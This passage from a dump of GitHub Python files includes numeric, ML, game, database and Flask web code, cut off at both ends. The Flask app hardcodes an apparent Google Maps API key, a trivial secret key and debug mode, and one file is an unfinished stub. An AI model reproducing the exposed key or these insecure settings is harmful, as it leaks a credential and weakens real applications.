self.go())\r\n self.b1.grid(row=4, column=0, pady=5)\r\n self.b2 = Button(self.frame, text = 'Exit', command = self.root.destroy)\r\n self.b2.grid(row=5, column=0, pady=5)\r\n self.root.mainloop()\r\n\r\ngui = GUI()\r\n","repo_name":"EduardoCastro15/Algoritmos-Geneticos","sub_path":"Practicas/Pracs/GENETIC_ALGORITHMS/SimpleAG/GA_Practice00.py","file_name":"GA_Practice00.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11656715434","text":"\"\"\"\nproblem statement: \n\"\"\"\n\nimport unittest\n\n\ndef find_triplet(arr):\n arr = sorted(arr) # nlogn step\n l = 0\n r = len(arr) - 1\n\n\nclass TestCase(unittest.TestCase):\n def test_triplet_sum(self):\n dataT = [([0, -1, 2, -3, 1], (-1, 0, 1))]\n for test in dataT:\n result = find_triplet(test[0])\n assert result == test[1]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"amitkmr/coding-questions","sub_path":"Arrays/find_triplet_with_zero_sum.py","file_name":"find_triplet_with_zero_sum.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"21118300704","text":"import numpy as np\n\nclass NearPoints:\n\tMILES_PER_LAT_DEGREE = 68.6863716\n\tMILES_PER_LONG_DEGREE_AT_EQUATOR = 69.1710411\n\n\tdef __init__(self, lat, lon):\n\t\t\"\"\"Helper class to find nearby points.\n\n\t\tThe MVP will blindly find points in a circle. 
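# Sketch (illustrative, not part of the original record): the golden-angle
# "sunflower" layout implemented by the NearPoints class in this record — b
# points forced onto the rim (the canonical choice is b ~ alpha * sqrt(n)),
# interior radii growing like sqrt(k) so density stays roughly uniform.
import numpy as np

def sunflower(n, alpha=1.0):
    b = int(round(alpha * np.sqrt(n)))          # number of boundary points
    phi = (np.sqrt(5) + 1) / 2                  # golden ratio
    pts = []
    for k in range(1, n + 1):
        r = 1.0 if k > n - b else np.sqrt(k - 0.5) / np.sqrt(n - (b + 1) / 2)
        theta = 2 * np.pi * k / phi**2
        pts.append((r * np.cos(theta), r * np.sin(theta)))
    return pts

assert all(x * x + y * y <= 1.0 + 1e-9 for x, y in sunflower(100))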
Subsequent\n\teditions should be more intelligent, finding key landmarks,\n\tonly walking through safe spaces, etc.\n\n\tKnown limitations: We do not expect this to work at the poles\n\tor near the international date line.\n\n\tThe sunflower algorithm is inspired by \n\thttp://stackoverflow.com/questions/28567166/uniformly-distribute-x-points-inside-a-circle\n\n\tArgs:\n\t\tlat: latitude of the epicenter.\n\t\tlon: longitude of the epicenter.\n\t\t\"\"\"\n\t\tself.lat = lat\n\t\tself.lon = lon\n\n\tdef _radius(self, k, num_points, b):\n\t\t\"\"\"\n\t\tArgs:\n\t\tk: current point being written.\n\t\tnum_points: total number of points.\n\t\tb: number of points placed on the perimeter.\n\t\t\"\"\"\n\t\tif k > (num_points - b):\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn np.sqrt(k-1/2) / np.sqrt(num_points-(b+1)/2)\n\n\tdef get_nearby_points(self, num_points, max_radius, alpha=1):\n\t\t\"\"\"Finds specified number of nearby points within radius.\n\n\t\tThe returned points are currently spread out uniformly within\n\t\tthe constraints of the radius.\n\n\t\tArgs:\n\t\tnum_points: number of points to be returned.\n\t\tmax_radius: max distance a point can lie from epicenter.\n\t\talpha: uniformity of the points.\n\n\t\tReturns:\n\t\titerable of n (lat,long) points.\n\t\t\"\"\"\n\t\tnearby_points = []\n\n\t\tb = int(max_radius * np.sqrt(num_points))\n\t\tphi = (np.sqrt(5)+1)/2\n\t\tfor k in range(1, num_points+1):\n\t\t\tr = self._radius(k,num_points,b)\n\t\t\ttheta = 2*np.pi*k/phi**2\n\t\t\tnearby_points.append((r*np.cos(theta), r*np.sin(theta)))\n\n\t\t# Convert distance in miles to degrees difference (this conversion\n\t\t# is different for latitude and longitude)\n\t\treturn [(self.lat + self._convert_vertical_dist_to_lat(dist_y * \\\n\t\t\t max_radius), self.lon + \\\n\t\t\t\t self._convert_horizontal_dist_to_longitude(self.lat, dist_x * max_radius)) \\\n\t\t\t\t for dist_y,dist_x in nearby_points]\n\n\tdef _convert_vertical_dist_to_lat(self, vertical_dist_miles):\n\t\t'''Converts a given distance (in miles) to its equivalent value\n\t\tin latitude degrees.\n\n\t\tSee https://stackoverflow.com/questions/1253499/simple-calculations-for-working-with-lat-lon-km-distance/1253545#1253545\n\n\t\tArgs:\n\t\tvertical_dist_miles: distance in miles going north/south\n\t\t'''\n\t\treturn vertical_dist_miles / self.MILES_PER_LAT_DEGREE\n\n\tdef _convert_horizontal_dist_to_longitude(self, current_latitude, \n\t\t\t\t\t\t\t\t\t\t\t horizontal_dist_miles):\n\t\t'''Converts a given distance (in miles) to its equivalent value\n\t\tin longitude degrees.\n\n\t\tSee https://stackoverflow.com/questions/1253499/simple-calculations-for-working-with-lat-lon-km-distance/1253545#1253545\n\n\t\tArgs:\n\t\tcurrent_latitude: current latitude degrees\n\t\thorizontal_dist_miles: distance in miles going east/west\n\t\t'''\n\t\treturn horizontal_dist_miles / (self.MILES_PER_LONG_DEGREE_AT_EQUATOR\n\t\t\t* np.cos(np.radians(current_latitude)))\n\n\n","repo_name":"arthurbrant21/transportation","sub_path":"NearPoints.py","file_name":"NearPoints.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"8570268613","text":"def main():\n    x1, v1, x2, v2 = map(int, input().strip().split())\n\n    result = kangaroo(x1, v1, x2, v2)\n    \n    print(result)\n\n# To be written in hackerRank\ndef kangaroo(x1, v1, x2, v2):\n    # Write your code here\n    while True:\n        if v2 >= v1:\n            return \"NO\"\n        \n        else:\n            x1 += v1 \n            x2 += v2\n            if x1 == x2:\n                return 
\"YES\"\n elif x1 > x2:\n return \"NO\"\n else:\n continue\n\nif __name__ == \"__main__\":\n main()","repo_name":"mustafaAtefmustafa/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task3/problem4_Kangaroo.py","file_name":"problem4_Kangaroo.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43510274972","text":"\"\"\"\nAuthor: Thomas Balzer\n(c) 2023\nMaterial for MMF Stochastic Analysis - Fall 2023\n\"\"\"\n\nimport plot_utilities as pu\nimport core_math_utilities as dist\nimport mmf_2023_1_portfolio_optimisation as p_opt\nimport numpy as np\n\n\"\"\"\nPortfolio Optimisation Examples - Homework #2\n\"\"\"\n\n\ndef marginal_utility_dpi(x, pi, risky_return, r):\n\n return (risky_return - r) / p_opt.portfolio_value(x, pi, risky_return, r)\n\n\ndef exp_marginal_utility(x, pi, u, d, p, r):\n\n return p * marginal_utility_dpi(x, pi, u, r) + (1-p) * marginal_utility_dpi(x, pi, d, r)\n\n\ndef portfolio_log_utility(x, pi, risky_return, r):\n\n return np.log(p_opt.portfolio_value(x, pi, risky_return, r))\n\n\ndef exp_utility(x, pi, u, d, p, r):\n\n return p * portfolio_log_utility(x, pi, u, r) + (1-p) * portfolio_log_utility(x, pi, d, r)\n\n\nif __name__ == '__main__':\n\n # basic parameters applicable to all questions\n _r = 0.05\n _x = 1.\n _u = 0.15\n _d = -0.05\n\n # determine minimum and maximum portfolio proportion to ensure V > 0\n min_portfolio = - (1. + _r) / (_u - _r)\n max_portfolio = - (1. + _r) / (_d - _r)\n print('Minimum Portfolio - ' + str(min_portfolio))\n print('Maximum Portfolio - ' + str(max_portfolio))\n\n step = 0.1\n n_steps = int((max_portfolio - min_portfolio)/step)\n # pis = [min_portfolio + (k+1) * step for k in range(n_steps-1)]\n pis = [-2. 
+ k * step for k in range(100)]\n\n _p = 0.6\n\n print('Utility of Risk-Free Portfolio ' + str(exp_utility(_x, 0., _u, _d, _p, _r)))\n\n \"\"\"\n Plotting the expected utility and its derivative as a function of $\\pi$\n \"\"\"\n exp_util = [exp_utility(_x, pi, _u, _d, _p, _r) for pi in pis]\n exp_marg_util = [exp_marginal_utility(_x, pi, _u, _d, _p, _r) for pi in pis]\n colors = ['red', 'blue']\n mp = pu.PlotUtilities('Expected Utility and Derivative as Function of $\\pi$', '$\\pi$', 'None')\n mp.sub_plots(pis, [exp_util, exp_marg_util], ['Utility', 'Derivative'], colors)\n\n # Solving numerically where the derivative is zero\n eps = 1e-08\n max_exp_utility_portfolio = pis[np.argmax(exp_util)]\n print ('Maximum Portfolio (Numerically) - ' + str(max_exp_utility_portfolio))\n\n pi_star = (1+_r)*(_p * (_u-_d) + (_d-_r)) / (_r-_d) / (_u-_r)\n print('Log-Optimal Portfolio: ' + str(pi_star))\n\n print('Optimal Expected Utility: ' + str(exp_utility(_x, pi_star, _u, _d, _p, _r)))\n\n print('Monte Carlo Approximation of Value Function...')\n\n sample_size = 10000\n uniform_sample = np.random.uniform(0., 1., sample_size)\n ev = 0\n for uni in uniform_sample:\n ev = ev + portfolio_log_utility(_x, pi_star, (_u if uni < _p else _d), _r)\n\n print('MC Expected Optimal Utility: ' + str(ev / sample_size))\n\n # plotting utility as a function of portfolio\n util_mc = []\n for pi in pis:\n ev = 0\n for uni in uniform_sample:\n ev = ev + portfolio_log_utility(_x, pi, (_u if uni < _p else _d), _r)\n util_mc.append(ev / sample_size)\n\n mp = pu.PlotUtilities('Expected Utility Exact and MC', '$\\pi$', 'None')\n mp.sub_plots(pis, [exp_util, util_mc, [eu - um for eu, um in zip(exp_util, util_mc)]],\n ['Exact', 'MC', 'Diff'], ['red', 'green', 'blue'])\n\n print('Moment Matching Approximation of Optimal Utility...')\n\n mean_p = p_opt.exp_portfolio_value(_x, pi_star, _u, _d, _p, _r)\n var_p = p_opt.variance_portfolio_value(_x, pi_star, _u, _d, _p)\n\n print('Portfolio Mean: ' + str(mean_p))\n print('Portfolio Variance: ' + str(var_p))\n\n b = np.sqrt(np.log(var_p/mean_p/mean_p + 1.))\n\n normal_sample = [dist.standard_normal_inverse_cdf(1. 
- uni) for uni in uniform_sample]\n\n values_app = [mean_p * np.exp(b * ns - 0.5 * b * b) for ns in normal_sample]\n utility_app = [np.log(v) for v in values_app]\n\n print('MM Utility: ' + str(np.average(utility_app)))\n\n print('Moment Matched Mean(MC): ' + str(np.average(values_app)))\n values_ex = [p_opt.portfolio_value(_x, pi_star, (_u if uni < _p else _d), _r) for uni in uniform_sample]\n print('Mean (MC): ' + str(np.average(values_ex)))\n\n # scatter plot of the simulated defaults\n colors_sc = ['blue']\n\n mp = pu.PlotUtilities('Portfolio Value and Approx', 'x', 'y')\n mp.scatter_plot(values_ex, [values_app], ['None'], colors_sc)\n\n nv = 0\n util_approx = []\n for pi in pis:\n mean_pf = p_opt.exp_portfolio_value(_x, pi, _u, _d, _p, _r)\n var_pf = p_opt.variance_portfolio_value(_x, pi, _u, _d, _p)\n b = np.sqrt(np.log(var_pf / mean_pf / mean_pf + 1.))\n nv = 0\n for ns in normal_sample:\n v = (mean_pf * np.exp(b * ns - 0.5 * b * b))\n nv = nv + np.log(v)\n util_approx.append(nv/sample_size)\n\n mp = pu.PlotUtilities('Expected Utility Exact vs Moment Matched', '$\\pi$', 'None')\n mp.sub_plots(pis, [exp_util, util_approx, [eu - um for eu, um in zip(exp_util, util_approx)]],\n ['Exact', 'MM', 'Diff'], ['red', 'green', 'blue'])\n","repo_name":"drthomasbalzer/mmf_2023","sub_path":"mmf_2023_2_portfolio_optimisation_homework.py","file_name":"mmf_2023_2_portfolio_optimisation_homework.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"24461553902","text":"#! /usr/bin\n# -*- coding: UTF-8 -*-\n\nfrom __future__ import print_function\n\ndef main():\n\n # Read the input\n with open('input', 'rb') as in_file:\n file_contents = in_file.readlines()\n\n input = str(file_contents[0].rstrip())\n\n elf_1_index = 0\n elf_2_index = 1\n\n # The starting recipes\n recipe_list = [3, 7]\n\n tail = []\n while not input in ''.join(map(str, tail)):\n tail = recipe_list[-1 * (2 + len(input)):]\n recipe_list += generate_new_recipes(elf_1_index, elf_2_index, recipe_list)\n elf_1_index = get_next_recipe_index(elf_1_index, recipe_list)\n elf_2_index = get_next_recipe_index(elf_2_index, recipe_list)\n\n print('{input} first appears after {start} recipes.'.format(\n input=input,\n start=''.join(map(str, recipe_list)).index(input)\n ))\n\n\ndef print_recipe_list(i1, i2, recipe_list):\n for i in range(0, len(recipe_list)):\n if i == i1:\n print('({val})'.format(val=recipe_list[i]), end='')\n elif i == i2:\n print('[{val}]'.format(val=recipe_list[i]), end='')\n else:\n print(' {val} '.format(val=recipe_list[i]), end='')\n print('')\n\ndef generate_new_recipes(index1, index2, recipe_list):\n r1 = recipe_list[index1]\n r2 = recipe_list[index2]\n new_recipe_scores = r1 + r2\n return map(int, list(str(new_recipe_scores)))\n\n\ndef get_next_recipe_index(starting_index, recipe_list):\n next_recipe_index = starting_index + 1 + recipe_list[starting_index]\n next_recipe_index = next_recipe_index % len(recipe_list)\n return next_recipe_index\n\nif __name__ == '__main__':\n main()\n","repo_name":"mbamber/AdventOfCode2018","sub_path":"day14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71517770387","text":"import torch \nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom sklearn import metrics\nimport numpy as 
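# Sketch (illustrative, not part of the original records): the lognormal
# moment-matching step in the portfolio record above — with
# b = sqrt(log(var/mean^2 + 1)), V = mean * exp(b*Z - b^2/2) reproduces the
# target mean and variance for standard normal Z (checked by Monte Carlo).
import numpy as np

mean_p, var_p = 1.08, 0.01
b = np.sqrt(np.log(var_p / mean_p**2 + 1.0))
z = np.random.default_rng(2).standard_normal(200_000)
v = mean_p * np.exp(b * z - 0.5 * b * b)
assert abs(v.mean() - mean_p) < 1e-2
assert abs(v.var() - var_p) < 1e-2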
np\nimport time\nfrom utils import get_time_diff\n\nclass Executor:\n def __init__(self, config):\n super().__init__()\n self.config = config\n\n def train_model(self, data_loader, model):\n # 训练模型\n start_time = time.time() #获取起始位置\n optimizer = optim.Adam(model.parameters(), lr=self.config.learn_rate, betas=(0.9, 0.999))\n model.train()\n criterion = nn.CrossEntropyLoss()\n total_batch = 0\n for data_batch in data_loader:\n total_batch += 1\n sentences1 = data_batch[0]\n sentences2 = data_batch[1]\n labels = data_batch[2]\n if torch.cuda.is_available(): # 判断设备信息\n sentences1 = data_batch[0].to(self.config.device)\n sentences2 = data_batch[1].to(self.config.device)\n labels = data_batch[2].to(self.config.device)\n optimizer.zero_grad()\n outputs = model(sentences1, sentences2)\n #计算 loss\n loss = criterion(outputs, labels) \n loss.backward()\n optimizer.step()\n\n if total_batch % 100 == 0:\n true_label = labels.data.cpu().numpy()\n predict = torch.max(outputs, dim=1)[1].cpu().numpy() #获取预测结果\n train_acc = metrics.accuracy_score(true_label, predict)\n time_diff = get_time_diff(start_time)\n msg = 'Iter:{0:>6} Train loss: {1:>5.3} Train acc:{2:>6.2%} Time:{3}'\n print(msg.format(total_batch, loss.item(), train_acc, time_diff))\n\n\n def evaluate_model(self, data_loader, model):\n start_time = time.time()\n model.eval()\n total_loss = 0\n predicts_all = np.array([], dtype=int)\n labels_all = np.array([], dtype=int)\n criterion = nn.CrossEntropyLoss()\n with torch.no_grad():\n for data_batch in data_loader:\n sentences1 = data_batch[0]\n sentences2 = data_batch[1]\n labels = data_batch[2]\n if torch.cuda.is_available():\n sentences1 = data_batch[0].to(self.config.device)\n sentences2 = data_batch[1].to(self.config.device)\n labels = data_batch[2].to(self.config.device)\n outputs = model(sentences1, sentences2)\n loss = criterion(outputs, labels)\n total_loss += loss.item()\n # 将预测结果写入记录\n predict = torch.max(outputs, dim=1)[1].cpu().numpy()\n labels = labels.data.cpu().numpy()\n labels_all = np.append(labels_all, labels)\n predicts_all = np.append(predicts_all, predict)\n #生成评估结果\n acc = metrics.accuracy_score(labels_all, predicts_all)\n report = metrics.classification_report(labels_all, predicts_all, digits=4)\n confusion = metrics.confusion_matrix(labels_all, predicts_all) # 混淆矩阵\n f1_score = metrics.f1_score(labels_all, predicts_all, average='macro')\n return acc, total_loss / len(data_loader), report, confusion, f1_score\n\n def inference(self, data_loader, model):\n # 预测输出\n predicts_all = np.array([], dtype=int)\n model.eval()\n with torch.no_grad():\n for batch in data_loader:\n sentences1 = batch[0]\n sentences2 = batch[1]\n if torch.cuda.is_available():\n sentences1 = batch[0].to(self.config.device)\n sentences2 = batch[1].to(self.config.device)\n outputs = model(sentences1, sentences2)\n predict = torch.max(outputs, dim=1)[1].cpu().numpy()\n predicts_all = np.append(predicts_all, predict)\n\n return predicts_all\n\n\n","repo_name":"LeslieOverfitting/nlp_AFQMC","sub_path":"executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41472624247","text":"import pygame as pg\n\nfrom .. 
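# Sketch (illustrative, not part of the original record): torch.max(outputs,
# dim=1)[1], used throughout the Executor above, returns the per-row argmax
# class index; torch.argmax is the equivalent spelling.
import torch

outputs = torch.tensor([[0.1, 0.9], [0.8, 0.2]])
pred = torch.max(outputs, dim=1)[1]
assert torch.equal(pred, torch.argmax(outputs, dim=1))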
import tools, prepare\nfrom ..components import transport_sleigh\n\nclass IntroSplash(tools._State):\n def __init__(self):\n super(IntroSplash, self).__init__()\n self.next = \"MANAGING\"\n self.player = prepare.PLAYER\n self.image = prepare.GFX[\"title\"]\n center_point = pg.display.get_surface().get_rect().center\n self.image_rect = self.image.get_rect(center=center_point)\n self.cursor = prepare.GFX[\"canecursor\"]\n screen = pg.display.get_surface().get_rect()\n self.sleigh = transport_sleigh.TransportSleigh((screen.right + 10, 200), None)\n self.persist[\"player\"] = self.player\n self.persist[\"helping\"] = False\n pg.mouse.set_visible(False)\n \n def get_event(self, event):\n if event.type == pg.MOUSEBUTTONDOWN:\n self.done = True\n \n def update(self, surface, keys, dt):\n surface.blit(self.image, self.image_rect)\n self.sleigh.rect.move_ip(-1, 0)\n self.sleigh.draw(surface)\n surface.blit(self.cursor, pg.mouse.get_pos()) \n\n","repo_name":"iminurnamez/NorthPole","sub_path":"data/states/introsplash.py","file_name":"introsplash.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"23971158750","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split, GridSearchCV, RandomizedSearchCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport pickle\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom lazypredict.Supervised import LazyClassifier\n\ndf = pd.read_csv('diabetes.csv')\n\n\n# data processing\n#print(df.head())\nprint(df.info()) # check null value\n\n# check number of classes of target\nnumber_class = df['Outcome']\nprint(number_class.value_counts())\n\n\n# check dtype of data\n#print(df.dtypes)\n\n# summary data\n#print(df.describe())\n\n\n# data visualization\n\n# histogram for all data\n#df.hist() \n\n# Density plot for all data\n\n#df.plot(kind = 'density', subplots = True, layout =(3,3), sharex = False)\n\n\n# box plot for all data\n#df.plot(kind = 'box', subplots = True, layout =(3,3), sharex = False)\n\n\n# correlation matrix\n\n#sns.heatmap(data=df.corr(), annot= True)\n\n\n# scatter matrix plot\n#scatter_matrix(df)\n#plt.show()\n\n\n# Data split\n\ntarget = 'Outcome'\ny = df[target]\nx = df.drop(target, axis= 1)\n\nx_train, x_test, y_train, y_test = train_test_split(x,y, test_size=0.2, random_state= 42)\n\nnum_transformer = Pipeline(steps=[\n (\"imputer\", SimpleImputer(strategy=\"mean\")),\n (\"scaler\", StandardScaler())\n])\n\n\npreprocess = ColumnTransformer(transformers=[\n ('num_feature', num_transformer, [\"Pregnancies\",\"Glucose\",\"BloodPressure\",\"SkinThickness\",\"Insulin\",\"BMI\",\"DiabetesPedigreeFunction\",\"Age\"])\n])\n\ncls = Pipeline(steps=[\n (\"preprocess\", preprocess), \n ('model', SVC())\n])\n\nparam_grid = {\n 'model__C': [1, 2, 3],\n 'model__kernel': ['linear', 'poly', 'rbf', 'sigmoid'],\n \"preprocess__num_feature__imputer__strategy\": ['mean', 'median']\n}\n\ncls_cv = GridSearchCV(cls, param_grid, verbose= 1, n_jobs=4, scoring=\"accuracy\",cv = 6)\n#cls = SVC()\ncls_cv.fit(x_train, y_train)\n# save model using pickle\n#pickle.dump(cls, open('svc_model.pkl', 'wb')) # wr: write binary\n\n# load model\n#model = 
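# Sketch (illustrative, not part of the original record): the
# double-underscore names in param_grid above ("model__C",
# "preprocess__num_feature__imputer__strategy") are sklearn's parameter
# routing convention — each step name descends one level into the nested
# Pipeline/ColumnTransformer.
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

pipe = Pipeline([("scaler", StandardScaler()), ("model", SVC())])
pipe.set_params(model__C=2, model__kernel="linear")
assert pipe.get_params()["model__C"] == 2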
pickle.load(open('svc_model.pkl', 'rb'))\n#y_predict = model.predict(x_test)\n\ny_predict = cls_cv.predict(x_test)\n\n\nprint(cls_cv.best_estimator_)\nprint(cls_cv.best_score_)\nprint(cls_cv.best_params_)\n\n\nfor i, j in zip(y_test, y_predict):\n    print('y_true',i, 'y_pred', j)\n\n\n\n# print(cls.support_)\n# print(cls.support_vectors_)\n# classifier report\nprint('----- classifier report -------------')\nprint(classification_report(y_test, y_predict))\n\n# confusion matrix\nprint('----- confusion matrix -------------')\nprint(confusion_matrix(y_test, y_predict))\n","repo_name":"khuchuuanh/Machine-learning","sub_path":"classifier_algorithms/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"43566754356","text":"import pymongo\n\nMONGO_CONNECTION_STRING = 'mongodb://localhost:27017'\nMONGO_DB_NAME = 'movies'\nMONGO_COLLECTION_NAME = 'movies'\nclient = pymongo.MongoClient(MONGO_CONNECTION_STRING)\ndb = client['movies']\ncollection = db['movies']\n\nprint('find method: query for multiple documents')\nresults = collection.find()\nprint(results)\nfor result in results:\n    print(result)\n\nprint(\"count\")\ncount = collection.find().count()\nprint(count)","repo_name":"yang5426/pythonCrawler","sub_path":"pthonCrawler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42919099051","text":"from flask import Flask, redirect, url_for, session, flash, render_template, request, abort\nfrom flask_oauth import OAuth\nfrom google import GoogleFactory\n# from provider import DataProvider\nfrom mongo import MongoProvider\nfrom pagination import Pagination\nimport googlemaps\nimport urllib\nimport locale\nimport json\nimport re\nimport sys\n\n# You must configure these 3 values from Google APIs console\n# https://code.google.com/apis/console\njson_data = open('client_secret.json').read()\nclient = json.loads(json_data)\n\nGOOGLE_CLIENT_ID = client['web']['client_id']\nGOOGLE_CLIENT_SECRET = client['web']['client_secret']\nREDIRECT_URI = '/authorized' # one of the Redirect URIs from Google APIs console\n\nSECRET_KEY = 'mysecretkeyisverysecret'\nDEBUG = True\nPER_PAGE = 6\napp = Flask(__name__)\napp.debug = DEBUG\napp.secret_key = SECRET_KEY\noauth = OAuth()\ngmaps = googlemaps.Client(key='AIzaSyC9Jw099A_9uXyK8KFQPxR93-cg3ks5E40')\ndb = MongoProvider('config.ini')\n# provider = DataProvider(mapClient=gmaps, mongo=db)\napi = GoogleFactory()\ngoogle = oauth.remote_app(\n\t'google',\n\tbase_url='https://www.google.com/accounts/',\n\tauthorize_url=client['web']['auth_uri'],\n\trequest_token_url=None,\n\trequest_token_params = {\n\t\t'scope': 'https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/calendar',\n\t\t'response_type': 'code',\n\t},\n\taccess_token_url=client['web']['token_uri'],\n\taccess_token_method='POST',\n\taccess_token_params={'grant_type': 'authorization_code'},\n\tconsumer_key=GOOGLE_CLIENT_ID,\n\tconsumer_secret=GOOGLE_CLIENT_SECRET\n)\n\nlocale.setlocale(locale.LC_ALL, 'id_ID.UTF-8')\n\ndef makeLabel(index, name, address):\n\ttext = render_template(\n\t\t'map-label.var', name=name, address=address, index=index\n\t)\n\ttext = re.sub(' +', ' ', text.strip())\n\treturn text\n\ndef makeTitle(full_text):\n\ttext = [s.strip() for s in full_text.splitlines()]\n\ttext = text[0].split(\"|\")[0]\n\treturn text\n\ndef getProfile():\n\taccess_token = 
session.get('access_token')\n\tif access_token is None:\n\t\treturn None\n\n\taccess_token = access_token[0]\n\treq = api.make_request_info(access_token)\n\n\ttry:\n\t\tres = urllib.request.urlopen(req)\n\texcept urllib.error.HTTPError as e:\n\t\tif e.code == 401:\n\t\t\t# Unauthorized - bad token\n\t\t\tsession.pop('access_token', None)\n\t\t\tabort(401)\n\t\treturn None\n\treturn json.loads(res.read())\n\ndef getEntries(page, limit, data=None):\n\tif page < 1:\n\t\treturn []\n\toffset = (page - 1) * limit\n\tif data is None:\n\t\treturn db.getEntries(offset, limit)\n\ndef addEventToCalendar(data, title, date, location):\n\taccess_token = session.get('access_token')\n\tif access_token is None:\n\t\treturn redirect(url_for('signin', next=url_for('insert_calendar')))\n\n\taccess_token = access_token[0]\n\treq = api.make_request_calendar(access_token, data, title, date, location=location)\n\ttry:\n\t\tres = urllib.request.urlopen(req)\n\texcept urllib.error.HTTPError as e:\n\t\tflash(json.dumps(e.read()), \"error\")\n\t\tif e.code == 401:\n\t\t\t# Unauthorized - bad token\n\t\t\tsession.pop('access_token', None)\n\t\t\tabort(401)\n\t\treturn None\n\treturn json.loads(res.read())\n\n@app.route('/api/places', methods = ['POST'])\ndef get_place():\n\tdata = request.get_json()\n\t# print(data)\n\tresult = db.searchEventsByLocation(\n\t\t{'name': data['name'], 'address': data['address'], 'location': data['location']}\n\t)\n\tprint(result.count())\n\t# return json.dumps(list(result))\n\treturn render_template('sidelist.html', datas=result)\n\n@app.route('/featured', defaults={ 'page' : 1, 'limit' : PER_PAGE })\n@app.route('/featured/page/<int:page>', defaults={ 'limit' : PER_PAGE })\n@app.route('/featured/page/<int:page>/limit/<int:limit>')\ndef home(page, limit):\n\tdata = db.getAll()\n\tcount = data.count()\n\tpagination = Pagination(page, limit, count)\n\tentries = getEntries(page, limit)\n\treturn render_template(\"featured.html\", pagination=pagination, datas=entries)\n\n@app.route('/detail/<id>')\ndef detail(id=None):\n\tif id is None:\n\t\treturn abort(404)\n\n\tdata = db.getId(id)\n\tif data is None:\n\t\treturn abort(404)\n\n\tlocations = []\n\tlabels = []\n\tname_address = []\n\n\tif 'place' in data['entities'].keys():\n\t\tfor index, d in enumerate(data['entities']['place']):\n\t\t\tlocations.append(d['location'])\n\t\t\tname_address.append(\n\t\t\t\t{'name': d['name'], 'address': d['address'], 'location': d['location']}\n\t\t\t)\n\t\t\ttext = makeLabel(index, d['name'], d['address'])\n\t\t\tlabels.append(text)\n\n\treturn render_template('detail.html', data=data, locations=locations, labels=labels, name_address=name_address)\n\n@app.route('/upcoming')\ndef upcoming():\n\t# return list(db.getAllTimse())\n\tlocations = []\n\tlabels = []\n\tname_address = []\n\n\tdata = db.searchEventsByUpcoming().distinct('entities.place')\n\tfor index, d in enumerate(data):\n\t\tlocations.append(d['location'])\n\t\tname_address.append(\n\t\t\t{'name': d['name'], 'address': d['address'], 'location': d['location']}\n\t\t)\n\t\ttext = makeLabel(index, d['name'], d['address'])\n\t\tlabels.append(text)\n\n\treturn render_template('index.html', locations=locations, labels=labels, name_address=name_address) \n\n@app.route('/')\n@app.route('/search/<query>')\ndef index(query=None):\n\tif session.get('url'):\n\t\turl = session.pop('url', None)\n\t\treturn redirect(url)\n\n\tlocations = []\n\tlabels = []\n\tname_address = []\n\t\n\tif query is None:\n\t\tdata = db.getAllPlace()\n\t\tfor index, d in 
enumerate(data):\n\t\t\tlocations.append(d['location'])\n\t\t\tname_address.append(\n\t\t\t\t{'name': d['name'], 'address': d['address'], 'location': d['location']}\n\t\t\t)\n\t\t\ttext = makeLabel(index, d['name'], d['address'])\n\t\t\tlabels.append(text)\n\telse:\n\t\tdata = gmaps.places(query=query)\n\t\tfor index, d in enumerate(data['results']):\n\t\t\tlocations.append(d['geometry']['location'])\n\t\t\tname_address.append(\n\t\t\t\t{'name': d['name'], 'address': d['formatted_address'], 'location': d['geometry']['location']}\n\t\t\t)\n\t\t\ttext = makeLabel(index, d['name'], d['formatted_address'])\n\t\t\tlabels.append(text)\n\t\t\t\n\t# datas = db.getEntries(0, 6)\n\t\n\t# return json.dumps(name_address)\n\treturn render_template('index.html', locations=locations, labels=labels, name_address=name_address) \n\n@app.route('/signin')\ndef signin():\n\turl = request.args.get('next', url_for('index'))\n\taccess_token = session.get('access_token')\n\tif access_token is None:\n\t\tsession['url'] = url\n\t\treturn redirect(url_for('login'))\n\treturn redirect(url)\n\n@app.route('/add_reminder/<id>')\ndef insert_calendar(id):\n\turl = request.args.get('next', url_for('index'))\n\tdata = db.getId(id)\n\tif 'name' in data['entities'].keys():\n\t\ttitle = data['entities']['name'][0]\n\telse:\n\t\ttitle = makeTitle(data['full_text'])\n\n\tif 'place' in 